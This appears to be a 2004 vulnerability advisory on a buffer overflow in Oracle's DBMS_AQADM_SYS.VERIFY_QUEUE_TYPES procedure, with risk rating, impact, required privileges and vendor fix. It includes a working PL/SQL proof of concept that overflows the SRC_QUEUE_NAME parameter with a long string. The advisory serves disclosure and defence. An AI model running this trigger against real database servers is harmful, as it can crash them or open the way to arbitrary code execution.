|
#30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When VERIFY_QUEUE_TYPES procedure is called with a long string in the SRC_QUEUE_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_TRANSFORMATION VARCHAR2(32767);
P_QUEUE_EXISTS BOOLEAN;
P_GET_NRP BOOLEAN;
P_RC BINARY_INTEGER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_SRC_QUEUE_NAME := AAA;
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
P_QUEUE_EXISTS := FALSE;
P_GET_NRP := FALSE;
SYS.DBMS_AQADM_SYS.VERIFY_QUEUE_TYPES(SRC_QUEUE_NAME => P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, TRANSFORMATION => P_TRANSFORMATION, QUEUE_EXISTS =>
P_QUEUE_EXISTS, GET_NRP => P_GET_NRP, RC => P_RC);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users granted execute permissions on DBMS_AQADM_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
